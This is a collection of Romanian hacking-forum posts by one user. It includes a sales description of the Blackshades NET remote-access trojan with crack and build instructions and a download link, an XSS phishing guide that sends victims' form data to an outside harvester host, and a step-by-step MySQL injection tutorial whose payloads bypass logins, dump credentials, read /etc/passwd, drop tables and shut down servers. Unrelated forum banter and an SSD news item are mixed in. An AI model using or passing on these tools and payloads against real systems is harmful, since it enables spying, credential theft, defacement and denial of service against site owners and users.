Nytro

Blackshades NET 3.4 by DaPimp & M4x Deciding between a RAT, a host booter, or controlling a botnet has never been easier. With Blackshades NET, you get the best of all three - all in one with an easy to use, nice looking interface. You are able to choose between four crisp looking skins, with the default being a very nicely-fitting black theme. Even better, Blackshades NET does a lot of the work for you - it can automatically map your ports, seed your torrent for you, and spread through AIM, MSN, ICQ and USB devices. Don't know how to set up a RAT? Many people are here to help - and there are tutorials, too! A big thing in deciding could be the fact that Blackshades NET customers get a 20% discount on Blackshades Crypt! Blackshades NET is a very advanced Remote Administration tool coded in Visual Basic 6. Unlike many of you think, VB6 is not as limited and useless as you think. This RAT, unlike many other that are for sale on the marketplace, has no dependencies (.NET Framework, java, etc) and works extremely well. Purchasing will provide you with lifetime updates, even major updates. It is regularly updated and is as soon as needed. The current version is 3.3 Customers also get their own support forum where they can give suggestions for updates, report bugs, get support from the coders and other members, and more! Because of this, I no longer offer remote support over MSN or Teamviewer. If you are having a problem, it is better to search the forum to see if others are having it and to have it archived if it is a legitimate problem. Not only that, but customers of my product are so happy with it that they are willing to offer support to new users -without me paying them or giving them free copies- to make sure all users are dealt with as I am busy with sales of Blackshades and (new!) Blackshades Crypt. Still not enough to confirm that even noobs can use this, the package comes with two very detailed, picture-heavy tutorials compiled by SakiMCM. Everyone should thank him for these great tuts! A couple things to note before purchasing: - The stub is NOT FUD! - You get lifetime updates - Support is offer, but NOT by me! I have people to take care of it: look below. - It is NOT my responsibility to go on teamviewer and walk you through this step-by-step. There are two extremely in-depth tutorials. - Server works great on Windows XP/Vista/7/2000/2003 - It is HWID protected. If you format a lot, I can update your HWID quickly. Payment is Simple: I accept these payment methods (in order of prefference) - AlertPay - Western Union - WMZ - Liberty Reserve - Moneybookers The price is a light, one time fee which includes all updates of the program Price: $50 For Question/Sales information/Support/Bug Reports/Help/Suggestions, just post in the right forum here or PM me! Commands: - Ping - Filter Connections (By ID, WAN, LAN, DDOS, IM, USB, Username, Comp. Name, Privileges, OS, Uptime, Idle, Ping, Socks4, Country, Version) - Install Date - Change Host (New DNS to connect to) - Select All/Range - Resolve Hostname - Copy (WAN, LAN, Socks, Full Info, Entire List, Socks Checker List) - Audio Capture - Full MSN Controller (Block, Add, Unblock, Mass message!) - Screen Capture and Control (Mouse/Keyboard supported, choose bitsize for quicker transfer) - Keylog Manager (All/Selected/Single, Filtered/Scan/Complete) - Webcam Capture - DDoS (UDP/TCP, select packet/sockets/packet size/port/ip, ability to ddos on join, by country, by ping, by IP range, or random) - View Network Statistics - Create Socks4 Proxy (Will not work behind NAT) - Pharming/Redirect - Sniffer - Website Visit (Visible/Multiple Times Hidden) - File Manager (Search, Execute, Upload, Delete, Download, Multi File Download, Folder Download, Advanced Image Gallery/Previewer) - Process Manager (Resume, Suspend, Kill) - Registry Manager (New Key, New Value, Delete Key, Delete Value) - Service Manager (Start, Stop) - Shell (cmd prompt) - Download/Execute - Update Idle Time - Seed Torrent - File Infector - Update Uptime - Fun Manager (Reverse/Normal Mouse, Open/Close CD Tray, Hide/Show Mouse, Hide/Show Desktop Icons, Start/Stop Crazy Mouse, Send Message Box, Change Wallpaper (by URL), Speak Text (Type it, then send it. Choose Slow-Mo, Speedy, or Regular Speed), Set Volume 100%, Mute Volume, Unmute Volume, Start Screensaver, Restart Computer, Logoff Computer, Shutdown Computer, Turn off Monitor, Turn on Monitor) - Passwords: Internet Explorer 7/8 Firefox 3.x CD Keys Windows Product Keys MSN Messenger Windows Messenger Windows Live Messenger (WinXP/Vista/7) Yahoo Messenger (5.x/6.x) Google Talk ICQ Lite (4.x/5.x/2003) AOL Instant Messenger (v4.6 or below/AIM 6.x/AIM Pro) Trillian Trillian Astra Miranda GAIM/Pidgin MySpace IM PaltalkScene Digsby Outlook Express Microsoft Outlook 2000/2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts) Windows Mail Windows Live Mail IncrediMail Eudora Netscape (6.x/7.x) Mozilla Thunderbird Group Mail Free Yahoo! Mail Hotmail/MSN mail Gmail Google Desktop Google Talk - Spread (USB, MSN, AIM/ICQ) - Edit ID - Update Server - Remove Server Features: Web Server - Control your bot through the web server, and also set up admin/guest accounts with editable privileges for guests! - Station - Host through your botnet through your bot to prevent tracebacks 100% - IP to Country Flags - New Bots show as Red - Icon Changer - Change to any .ico File - File Info Cloner - Clone file details of any exe file - Server Builder (Uses string replacement - no EOF needed!) - All settings are stored and remembered - After a sucessful login, you will not need to input your username and click login - it will automatically log you in. - Statistics (Disconnected, Attempt, Established Connection, etc) - View Chart of Bots by Country - Skin Chooser - choose between 4 lovely skins Wink - Database Logging (Log Passwords, Connections, Keylogs to SQL) - Tasks (Keylog, Passwords, DDoS Start/Stop, DL/Execute, Update without being @ PC) - Multi Transfers (Download multiple files at once, view multiple screens at once, or view multiple webcams at once!) - Process Protection (Optional) (Cannot be killed by task manager on Vista/7. On XP, you will get BSOD and restart - if protection fails on Vista/7, it will get BSOD and restart) - Network Sharing (Input the IP and Port of a friend and he can share your bots - update and remove are not allowed) - No dependencies required. Cracked again by DaPimp & M4x Crack Art: Loader + Builder Howto Use: 1.) Start "Client.exe" and wait until its Loaded (Login Screen), START AS ADMIN 2.) Start my Loader AS ADMIN 3.) When its finished press "1" and ENTER. 4.) Now you can Login on Blackshades with any Name! Howto create a Server: 1.) Start Blackshades (Look above) 2.) Configure your Server 3.) Press Build. 4.) Now a Messagebox appear, press Ctrl + C (Copy Paste) in the Messagebox and paste the Clipboard to Notepad! Now Copy the Middle line (///....///dummy///) COMPLETLY to Clipboard, without a new line or something other. --------------------------- Fehler --------------------------- ///47437A53475F5347437C535E///1234///5678///3F5935461A4E241D19///250423250C08031C092813470B1E17///app///25042305061915522928070C0002171F///09287E252B2822305A6058502D205F2F78202F4354312B0F4C2A595234290F53285754365530///0///0///0///0///0///CW2HAI288N///0///dummy/// --------------------------- OK --------------------------- So Copy the Config: ///47437A53475F5347437C535E///1234///5678///3F5935461A4E241D19///250423250C08031C092813470B1E17///app///25042305061915522928070C0002171F///09287E252B2822305A6058502D205F2F78202F4354312B0F4C2A595234290F53285754365530///0///0///0///0///0///CW2HAI288N///0///dummy/// 5.) Type a "2" in my Loader and press ENTER. 6.) Make sure you have the Blackshadesconfig on your Clipboard and press ENTER again. 7.) Server.exe is your finished Server! Download: http://rapidshare.com/files/424504020/BS_Crack_By_DaPimp.rar Nu l-am incercat, nu stiu daca e infectat, nu sunt raspunzator de nimic. Sursa: Blackshades NET 3.4 by DaPimp & M4x - r00tsecurity

Blackbuntu Ultimate OS for Hacking About Blackbuntu Blackbuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security. Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It's currently being built using the Ubuntu 10.10 and work on reference Back|Track. It's created in our own time as a hobby. Maintainer Team: Project Founder & Main Developer: c1ph3r < c1ph3r {at} blackbuntu . com > Developer: x-c0d3 < x-c0d3 {at} blackbuntu . com > Developer: mayaseven < mayaseven {at} blackbuntu . com > Contributor: salary < salary {at} blackbuntu . com > Contact us: We're requires some developers for working on a variety of interesting projects and in particular to join in an innovative and challenging project. just write to info {at} blackbuntu.com Review : http://www.youtube.com/watch?v=ELt2rl5vImg Download: http://www.blackbuntu.com/download

How to phish the effective and smart way using XSS Normally if you wish to phish a user for information like passwords, emails, social security numbers, credit card numbers or what not and you’re exploiting some website with a bug in its handling of user content (either from a database or from the GET data) (Please note that POST XSS exploits isn’t really easy to exploit since you’ll have to make the user POST the data him/herself) you normally would like to send the user to your own phishing page where you have copied the compromised sites design, CSS etc. Please note that when phishing by exploiting an unprotected frame which gets its content URL from a GET querystring (RFI) you’ll have to either copy the CSS etc to your own site or simply link to the sites own CSS files. Moving on to the topic of this post, exploiting XSS vulnerabilities to phish the attacked users, of course without the users having a clue. One of the methods which I don’t see get exploited is the JavaScript call “document.formName.action=’http://your-harvester-site.com/exploitingAction.php’”. With the code above it’s possible to create a man-in-the-middle kind of attack where you can either just choose to log the information of the form or you can choose to tamper with the information before posting the data to the original action. It can be done with this 3 step attack: 1. step: Inject the forms of a XSS exploitable page, e.g. with a script like this: http://www.e-x-e.dk/labs/autoPhisher/injector.js. A super simple yet effective script I’ll be using for this PoC. 2. step: Receive the form data, log it/tamper it and send the victim back to the original site with a new exploited URL injected with a “pusher”. This script could be done like this: http://www.e-x-e.dk/labs/autoPhisher/source/index.php This script is using a subclass of the abstract class TopLoader I’m using, it just has some basic functions for getting, setting, saving, deleting etc. The last part of the script is computing a new pusher-injected URL to which the victim will be sent. 3. step: Let the pusher to its job Since we cannot do a POST call for the victim to the original action serverside through PHP, we’ll have to make the browser do it for us through JavaScript. The pusher script generates some JavaScript which is started when the is window.onload(). It tries to set the value of the form elements from the original form submit by the victim with getElementById. If the element is not found by this method it’ll try to set the value via the getElementsByName. Last but not least it auto submits the correct form with document.forms[{form ID}].submit(). The generator script is here: http://www.e-x-e.dk/labs/autoPhisher/source/pusher.php Here a place you can test this thing out: http://www.doid.dk/page/main.asp?error=timeout&referer=%22%3E%3Cscript%20src=http://www.e-x-e.dk/labs/autoPhisher/injector.js%3E%3C/script%3E Example user / password: testerLars / testerLars Let me know what you think by making some comments and maybe leaving some more usage examples. Sursa: How to phish the effective and smart way using XSS | Thomas Stig Jacobsen's constant why Sfinte Cacat, ce fac de Revelion

Da. Eu nu pot numi Revelion ceea ce fac, macar fac ceva util asa. Si vin, manele si prajituri.

[B]Hellbound MySQL injection complete tutorial[/B] TABLE OF CONTENT: #INTRO #WHAT IS DATABASE? #WHAT IS SQL INJECTION? #BYPASSING LOGINS #ACCESSING SECRET DATA #Checking for vulnerability #Find the number of columns #Addressing vulnerable part #Finding MySQL version #MySQL 5 or above injection #MySQL 4 injection #MODIFYING SITE CONTENT #SHUTTING DOWN THE MySQL SERVER #LOADFILE #MySQL ROOT #MAJOR MySQL COMMANDS #FINALIZING THE INJECTION TUTORIAL #REFERENCES #SECURITY SITES #WARGAMEZ SITES #GREETZ AND SHOUTZ #THE END INTRO!! Greetz to all, I m sam207. In this tutorial, I will demonstrate the infamous MySQL injection in newbie perspective so that all the newbies become able to become successful SQL injector. But, be sure to check various php & mysql functions in various sites which will help you a lot... Also do not be harsh on me if there are any grammatical errors on the tutorial bcoz English is not my native language(I m from Nepal). Now lets begin our walkthrough of SQL injection. WHAT IS DATABASE? Just general info.. Database is the application that stores a collection of data. Database offers various APIs for creating, accessing and managing the data it holds. And database(DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties. DB may hold various critical informations like usernames, passwords, credit cares,etc. So, DB need to be secured but many DB servers running are insecured either bcoz of their vulnerability or bcoz of poor programming handles. To name few DB servers, MySQL(Open source), MSSQL, MS-ACCESS, Oracle, Postgre SQL(open source), SQLite, etc. WHAT IS SQL INJECTION? SQL injection is probably the most abundant programming flaw that exists on the internet at present. It is the vulnerability through which unauthorized person can access the various critical and private dat. SQL injection is not a flaw in the web or db server but but is a result of the poor and inexperienced programming practices. And it is one of the deadliest as well as easiest attack to execute from remote location. In SQL injection, we interact with DB server with the various commands and get various data from it. In this tutorial, I would be discussing 3 aspects of SQL injection namely bypassing logins, accessing the secret data and modifying the page contents. So lets head forward on our real walkthrough.. BYPASSING LOGINS Suppose, a site has a login form & only the registered users are allowed to enter the site. Now, say u wanted to bypass the login and enter the site as the legitimate user. If the login scblockedript is not properly sanitized by the programmer, u may have luck to enter the site. U might be able to login into the site without knowing the real username and real password by just interacting with the DB server. So, isn't that the beauty of SQL injection?? Let's see an example, where the username admin with the password sam207 can login to the site. Suppose, the SQL query for this is carried out as below: SELECT USER from database WHERE username='admin' AND password='sam207' And if above SELECT command evaluates true, user will be given access to the site otherwise not. Think what we could do if the scblockedript is not sanitized. This opens a door for the hackers to gain illegal access to the site. In this example, the attacker can enter the following user data in the login form: username:a or 1=1-- password:blank So, this would make our query as: SELECT USER from database WHERE username='a' or 1=1-- AND password='' Note that -- is the comment operator and anything after it will be ignored as a comment. There exists another comment operator which is /*. So our above query becomes: SELECT USER from database WHERE username='a' or 1=1 Now this query evaluates true even if there is no user called 'a' bcoz 1=1 is always true and using OR makes the query return true when one of the query is true. And this gives access to the site admin panel. There can be various other username and password combinations to play with the vulnerable sites. U can create ur own new combinations for the site login. Few such combinations are: username:' or 1='1 password:' or 1='1 username:' or '1'='1' password:' or '1'='1' username:or 1=1 password:or 1=1 and there are many more cheat sheets. Just google. In fact, you can create your own such combinations to bypass logins.. That's all about bypassing logins. ACCESSING SECRET DATA SQL injection is not essentially done for bypassing logins only but it is also used for accessing the sensitive and secret data in the DB servers. This part is long, so I would be discussing in the subsections. Sub-section 1: Checking for vulnerability Suppose, u got a site: www.site.com/article.php?id=5 Now to check if it is vulnerable, u would simply add ' in the end i.e. where id variable is assigned. So, it is: www.site.com/article.php?id=5' Now if the site is not vulnerable, it filters and the page loads normally. But, if it doesn't filter the query string, it would give the error something like below: "MySQL Syntax Error By '5'' In Article.php on line 15." or error that says us to check the correct MySQL version or MySQL Fetch error or sometimes just blank page. The error may be in any form. So it makes us sure that the site is vulnerable. Also just using ' may not be the sure test; so you may try different things like: www.site.com/article.php?id=5 union select 1-- If you get error with this, you again come to know that its vulnerable... Just try different things.. Sub-section 2: Find the number of columns So, now its time to find the number of columns present. For this purpose, we will be using 'order by' until we get error. That is, we make our URL query as: www.site.com/article.php?id=5 order by 1/* //this didn't give error. Now, I do increase it to 2. www.site.com/article.php?id=5 order by 2/* //still no error So, we need to increase until we get the error. In my example, I got error when I put the value 3 i.e. www.site.com/article.php?id=5 order by 3/* //this gave me error. So, it means there are 2 columns in the current table(3-1=2). This is how we find the number of columns. Sub-section 3: Addressing Vulnerable Part: Now, we need to use union statement & find the column which we can replace so as to see the secret data on the page. First lets craft the union statement which won't error.. This becomes like this: www.site.com/article.php?id=5 UNION ALL SELECT null/* This would error because our query needs to have one more null there.. Also null doesnot cause any type conversion error as it is just null.. So for our injection, it becomes: www.site.com/article.php?id=5 UNION ALL SELECT null,null/* For this we do: www.site.com/article.php?id=5 UNION ALL SELECT 1,2/* Now we will see the number(s) on the page somewhere. I mean, either 1 or 2 or both 1 & 2 are seen on the page. Note that the number may be displayed anywhere like in the title of the page or sometime even in the hidden tags in the source.. So, this means we can replace the number with our commands to display the private data the DB holds. In my example, 1 is seen on the page. This means, I should replace 1 with my thingsto proceed further. Got it??So lets move forward. Quick note: Sometime the numbers may not be displayed so it becomes hard for you to find the column which you can use to steal the data.. So in that case, you may try something like below: www.site.com/article.php?id=5 UNION ALL SELECT sam207,null/* or www.site.com/article.php?id=5 UNION ALL SELECT null,sam207/* If sam207 is displayed somewhere in the page, you may go further for injection replacing the text part... Here, I have kept text instead of integer to check if text is displayed... Also, be sure to check source because sometimes they may be in some hidden tags.. Sub-section 4: Finding MySQL version: For our injection, it is necessary to find the MySQL version bcoz if it is 5, our job becomes lot easier. To check the version, there is a function @@version or version(). So, what we do is replace 1(which is the replaceable part) with @@version i.e. we do as below: www.site.com/article.php?id=5 UNION ALL SELECT @@version,2/* or www.site.com/article.php?id=5 UNION ALL SELECT version(),2/* So, this would return the version of MySQL running on the server. But, sometimes u may get error with above query. If that is the case, do use of unhex(hex()) function like this: www.site.com/article.php?id=UNION ALL SELECT unhex(hex(@@version)),2/* Remember that if u have to use unhex(hex()) function here, u will also have to use this function in the injection process later on. @@version will give u the version. It may be either 4(or below) or 5 & above. I m now going to discuss the injection process for version 5 and 4 separately coz as I said earlier, version 5 makes it easy for us to perform the injection. Quick note: Also, you may check for user, database,etc.. by using following: www.site.com/article.php?id=5 UNION ALL SELECT user(),2/* www.site.com/article.php?id=5 UNION ALL SELECT database(),2/* Sub-section 5: MySQL 5 or above injection: Here, I m gonna show u how to access data in the server running MySQL 5 or above. U got MySQL version 5.0.27 standard using the @@version in url parameter. MySQL from version 5 has a useful function called information_schema. This is table that holds information about the tables and columns present in the DB server. That is, it contains name of all tables and columns of the site. For getting table list, we use: table_name from information_schema.tables For getting column list, we use: column_name from information_schema.columns So our query for getting the table list in our example would be: www.site.com/article.php?id=5 UNION ALL SELECT table_name,2 FROM information_schema.tables/* And yeah if u had to use unhex(hex()) while finding version, u will have to do: www.site.com/article.php?id=5 UNION ALL SELECT unhex(hex(table_name)),2 FROM information_schema.tables/* This will list all the tables present in the DB. For our purpose, we will be searching for the table containing the user and password information. So we look the probable table with that information. U can even write down the table names for further reference and works. For my example, I would use the tbluser as the table that contains user & password. Similarly, to get the column list, we would make our query as: www.site.com/article.php?id=5 UNION ALL SELECT column_name,2 FROM information_schema.columns/* This returns all the columns present in the DB server. Now from this listing, we will look for the probable columns for username and password. For my injection, there are two columns holding these info. They are username and password respectively. So that's the column what I wanted. U have to search and check the columns until u get no error. Alternatively to find the column in the specific table, u can do something like below: www.site.com/article.php?id=5 UNION ALL SELECT column_name,2 FROM information_schema.columns WHERE table_name='tbluser' This would display the columns present in the table tbluser. But this may not work always. Let me show u how I got to know that the above two columns belong to table tbluser. Now let me show how to display the username and password stored in the DB. There is a function called concat() that allows me to join the two columns and display on the page. Also I will be using :(colon) in the hex form. Its hex value is 0x3a(thats zero at beginning not alphabet o.) What I do is: www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/* And this gives me the username and password like below: admin:9F14974D57DE204E37C11AEAC3EE4940 Here the password is hashed and in this case, its MD5. Now u need to get the hash cracker like John The Ripper(www.openwalls.org), Cain & Able(www.oxid.it) and crack the hash. The hash may be different like SHA1, MD5,etc.. or sometimes plaintext password may be shown on the page. In this case, when I crack I get the password as sam207. Now u get to admin login page and login as admin. Then u can do whatever u like. So that's all for the MySQL version 5. Sub-section 6: MySQL version 4 injection: Now say ur victim has MySQL version 4. Then u won't be able to get the table name and column name as in MySQL version 5 bcoz it lacks support for information_schema.tables and information_schema.columns. So now u will have to guess the table name and column name until u do not get error. Also, if the mysql version is below 5, you may have to depend on the luck & error messages displayed.. Sometimes the error will give you the table name & column name & that gives you some idea to guess the correct table & columns name.. Say, the error reports sam207_article in the error.. So, you know that sam207_ is the prefix used in the table names... Anyway, lets go for MySQL version 4 injection... For example, u would do as below: www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/* Here, I guessed for the table name as user. But this gave me the error bcoz the table with the name user didn't exist on the DB. Now I kept on guessing for the table name until I didn't get error. When I put the table name as tbluser, the page loaded normally. So I came to know that the table tbluser exists. www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/* The page loaded normally. Now again u have to guess the column names present in the tbluser table. I do something like below: www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/* //this gave me error so there is no column with this name. www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/* //It loaded the page normally along with the username from the table. www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/* //it errored so again the column pass doesnot exist in the table tbluser. www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/* //the page loaded normally with password hash(or plaintext password). Now u may do this: www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/* This gave me: admin:9F14974D57DE204E37C11AEAC3EE4940 On cracking, I got sam207 as password. Now I just need to login the site and do whatever I wanted. Few table names u may try are: user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc. As said earlier, be sure to look on the errors because sometime they give fortunately for us the errors with table names & column names... U may try these methods so as to get various data such as credit card numbers, social security numbers, etc. and etc. if the database holds. Just what u need to do is figure out the columns and get them displayed on the vulnerable page. That's all on the injection for accessing secret data. MODIFYING SITE CONTENT: Sometime, u find the vulnerable site and get evrything to know but maybe admin login doesn't exist or it is accessible for certain IP range. Even in that context, u can use some kewl SQL commands for modifying the site content. I haven't seen much articles addressing this one so thought to include it here. Here, I will basically talk about few SQL commands u may use to change the site content. Therse commands are the workhorse of MySQL & are deadly when executed. First let me list these commands: UPDATE: It is used to edit infos already in the db without deleting any rows. DELETE: It is used to delete the contents of one or more fields. DROP: It is used completely delete a table & all its associated data. Now, u could have figured out that these commands can be very desctructive if the site lets us to interact with db with no sanitization & proper permission. Command Usage: UPDATE: Our vulnerable page is: www.site.com/article.php?id=5 Lets say the query is: SELECT title,data,author FROM article WHERE id=5 Though in reality, we don't know the query as above, we can find the table and column name as discussed earlier. So we would do: www.site.com/article.php?id=5 UPDATE article SET title='Hacked By sam207'/* or, u could alternatively do: www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY SAM207',data='Ur site has zero security',author='sam207'/* By executing first query, we have set the title value as 'Hacked By sam207' in the table article while in second query, we have updated all three fields title, data, & author in the table article. Sometimes, u may want to change the specific page with id=5. For this u will do: www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/* DELETE:As already stated, this deletes the content of one or more fields permanently from the db server. The syntax is: www.site.com/article.php?id=5 DELETE title,data,author FROM article/* or if u want to delete these fields from the id=5, u will do: www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/* DROP:This is another deadly command u can use. With this, u can delete a table & all its associated data. For this, we make our URL as: www.site.com/article.php?id=5 DROP TABLE article/* This would delete table article & all its contents. Finally, I want to say little about ; Though I have not used this in my tutorial, u can use it to end ur first query and start another one. This ; can be kept at the end of our first query so that we can start new query after it. SHUTTING DOWN MySQL SERVER: This is like DoSing the server as it will make the MySQL resources unavailable for the legitimate users or site visitors... For this, you will be using: SHUTDOWN WITH NOWAIT; So, you would craft a query which would execute the above command... For example, in my case, I would do the following: www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT; WOW! the MySQL server is down... This would prevent legitimate users & site visitors from using or viewing MySQL resources... LOADFILE: MySQL has a function called load_file which you can use for your benefits again.. I have not seen much site where I could use this function... I think we should have MySQL root privilege for this.... Also, the magic quotes should be off for this.. But there is a way to get past the magic quotes... load_file can be used to load certain files of the server such as .htaccess, .htpasswd, etc.. & also password files like etc/passwd, etc.. Do something like below: www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/* But sometimes, you will have to hex the part & do something like below: www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427) where I have hexed... Now, if we are lucky, the scblockedript would echo the etc/passwd in the result.. MySQL ROOT: If the MySQL version is 5 or above, we might be able to gain MySQL root privilege which will again be helpful for us.. MySQL servers from version 5 have a table called mysql.user which contains the hashes & usernames for login... It is in the user table of the mysql database which ships with every installation of MySQL.. For this, you will do: www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/* Now you will get the usernames & hashes.. The hash is mysqlsha1... Quick note: JTR won't crack it.. But www.insidepro.com has one to do it.. MAJOR MySQL COMMANDS: Below, I would list some major MySQL commands that might help you a lot... Play with them in different ways by setting up a MySQL server in your computer.. All the commands here are copy pasted from the post at www.h4cky0u.org & the credit for this part goes to the original author.. This is the only part which I didn't write myself.. I could have but since there is better one, I thought to put the same part here.. Thanks to whoever posted this in h4cky0u site.. & also full credits to him/her for this part.. ABORT -- abort the current transaction ALTER DATABASE -- change a database ALTER GROUP -- add users to a group or remove users from a group ALTER TABLE -- change the definition of a table ALTER TRIGGER -- change the definition of a trigger ALTER USER -- change a database user account ANALYZE -- collect statistics about a database BEGIN -- start a transaction block CHECKPOINT -- force a transaction log checkpoint CLOSE -- close a cursor CLUSTER -- cluster a table according to an index COMMENT -- define or change the comment of an object COMMIT -- commit the current transaction COPY -- copy data between files and tables CREATE AGGREGATE -- define a new aggregate function CREATE CAST -- define a user-defined cast CREATE CONSTRAINT TRIGGER -- define a new constraint trigger CREATE CONVERSION -- define a user-defined conversion CREATE DATABASE -- create a new database CREATE DOMAIN -- define a new domain CREATE FUNCTION -- define a new function CREATE GROUP -- define a new user group CREATE INDEX -- define a new index CREATE LANGUAGE -- define a new procedural language CREATE OPERATOR -- define a new operator CREATE OPERATOR CLASS -- define a new operator class for indexes CREATE RULE -- define a new rewrite rule CREATE SCHEMA -- define a new schema CREATE SEQUENCE -- define a new sequence generator CREATE TABLE -- define a new table CREATE TABLE AS -- create a new table from the results of a query CREATE TRIGGER -- define a new trigger CREATE TYPE -- define a new data type CREATE USER -- define a new database user account CREATE VIEW -- define a new view DEALLOCATE -- remove a prepared query DECLARE -- define a cursor DELETE -- delete rows of a table DROP AGGREGATE -- remove a user-defined aggregate function DROP CAST -- remove a user-defined cast DROP CONVERSION -- remove a user-defined conversion DROP DATABASE -- remove a database DROP DOMAIN -- remove a user-defined domain DROP FUNCTION -- remove a user-defined function DROP GROUP -- remove a user group DROP INDEX -- remove an index DROP LANGUAGE -- remove a user-defined procedural language DROP OPERATOR -- remove a user-defined operator DROP OPERATOR CLASS -- remove a user-defined operator class DROP RULE -- remove a rewrite rule DROP SCHEMA -- remove a schema DROP SEQUENCE -- remove a sequence DROP TABLE -- remove a table DROP TRIGGER -- remove a trigger DROP TYPE -- remove a user-defined data type DROP USER -- remove a database user account DROP VIEW -- remove a view END -- commit the current transaction EXECUTE -- execute a prepared query EXPLAIN -- show the execution plan of a statement FETCH -- retrieve rows from a table using a cursor GRANT -- define access privileges INSERT -- create new rows in a table LISTEN -- listen for a notification LOAD -- load or reload a shared library file LOCK -- explicitly lock a table MOVE -- position a cursor on a specified row of a table NOTIFY -- generate a notification PREPARE -- create a prepared query REINDEX -- rebuild corrupted indexes RESET -- restore the value of a run-time parameter to a default value REVOKE -- remove access privileges ROLLBACK -- abort the current transaction SELECT -- retrieve rows from a table or view SELECT INTO -- create a new table from the results of a query SET -- change a run-time parameter SET CONSTRAINTS -- set the constraint mode of the current transaction SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session SET TRANSACTION -- set the characteristics of the current transaction SHOW -- show the value of a run-time parameter START TRANSACTION -- start a transaction block TRUNCATE -- empty a table UNLISTEN -- stop listening for a notification UPDATE -- update rows of a table VACUUM -- garbage-collect and optionally analyze a database FINALIZING THE INJECTION TUTORIAL: I know I have missed some things like outfile, WHERE clause, blind injection,etc... If I get time, I would try to update the tutorial with these.. Also for all sql injectors, think in a broad way.. & hexing is an important part in sql injection.. Sometimes the things that can't be done with normal ways can be done by using the hex part.. & be sure to try things with char(), hex() functions.. With these, you can bypass magic quotes on the server.. Again, within the UNION statement, you may try to use the XSS which would be sometimes helpful for you.. www.site.com/article.php?id=5 UNION ALL SELECT <scblockedript>alert("XSS via SQL injection");</scblockedript>,2/* Again in the above injection, you may require to hex up the javascblockedript part for bypassing the magic quotes.. Also for starters & those who know little things, you may setup a MySQL server & configure PHP for your apache server in your localhost where you can try different things.. In the command line interface of MySQL, try various commands enlisted below.. Try by modifying them... This would help you improve your MySQL command knowledge.. Also try to see how PHP codes interact with MySQL server.. For example, install some free forums like PHPBB, SMF,etc.. or some content management system as it would help you in two ways.. First, you would learn how the PHP interacts with MySQL.. You may check MySQL folder with what changes has occured after installing them.. What would happen if I do this? or that?? etc..etc.. Second, you may be able to find bugs in them.. like rfi in some part of the code or sql injection in another part or maybe csrf injection,etc.. That would help you to learn new things because you all know practice makes the man perfect... REFERENCES: www.google.com.np www.milw0rm.com www.gonullyourself.org www.darkmindz.com *****Never hack without condoms else you will fuck yourself***** Peace~~ Sursa: HellBound Hackers

Ratati fara floci, invatati si voi sa respectati. Parintii sunt de vina ca sunteti niste aurolaci. Eu am mai vorbit cate ceva cu firewind si am vazut cum gandeste, are o varsta. Asa cu copii din ziua de azi. Copii fara viitor.

Ce cacat sunteti asa multi online? Sa beti cate un pahar pentru fiecare injuratura pe care mi-ati adresat-o, daca "va tine". Anu asta nu mai dau banuri

Dark_Knight a luat si bataie de la cineva, ce-i drept nu de pe RST, dar "din domeniu". Cel care l-a batut spunea ca e un gras urat si plin de cosuri. Dar parca e postata si o poza cu el pe aici pe undeva.

Daca e detectat ca fiind "Ardamax", probabil este vorba de "Ardamax" nu? Deci nu e "Yahoo! Messenger" sau "Winamp". Si din moment ce face niste lucruri urate e normal sa fie detectabil.

Trebuie ceva mai serios, va mirati apoi de ce sunt atat de multi membri prea putin seriosi...

Thanx. Ban permanent.

De ce contine fiecare executabil 3 fisiere PE (executabile sau DLL-uri, probabil executabile)? Nu stau sa le analizez, vreau doar o explicatie.

Cum ti le trimit? De ce se intelege prin Hip-Hop "muzica buna". Adica de ce intelegeti voi asta?

Noile SSD-uri de la Intel: de 8 ori mai mici decat anterioarele de Silviu Anton | 30 decembrie 2010 Unitatile de stocare SSD au din ce in ce mai multi adepti, iar partea buna la acest aspect este ca ele devin din ce in ce mai mici, ca si dimensiuni. Mult mai mici. Cele mai noi SSD-uri marca Intel, SSD 310, ofera aceeasi performanta ca si x25-urile care au aparut inaintea lor, insa, din punct de vedere al dimensiunilor ele reprezinta a opta parte din acestea. Noile drive-uri, care au fost concepute pentru notebook-uri, tablete si dispozitive industriale si militare, au o dimensiune de numai 51x30 mm si latime de 5 mm. Pana in prezent, Intel a semnat parteneriate pentru seria SSD 310 cu Lenovo, care vrea sa integreze drive-urile in urmatoarea generatie de ThinkPad-uri. Intel si-a propus sa livreze noile drive-urile catre producatorii de echipamente hardware in cantitati de cate 1000 de unitati, cu capacitati de 40GB (99 de dolari) si 80GB (179 de dolari). Specificatiile tehnice complete ale seriei Intel SSD 310 le puteti gasi chiar pe pagina Web a producatorului. Seria Intel SSD 310 este primul val dintr-o serie de noi SDD-uri care vor sosi incepand cu anul viitor. Iar noi le asteptam nerabdatori. Cu cat mai mici, cu atat mai bune! Sursa: Noile SSD-uri de la Intel: de 8 ori mai mici decat anterioarele | Hit.ro

Sunt foarte multe site-uri vulnerabile la XSS. Dar acest tip de vulnerabilitate e subestimata. Poti citi asta de exemplu: http://rstcenter.com/forum/17747-rst-folosire-xss-pentru-trece-de-protectia-csrf.rst

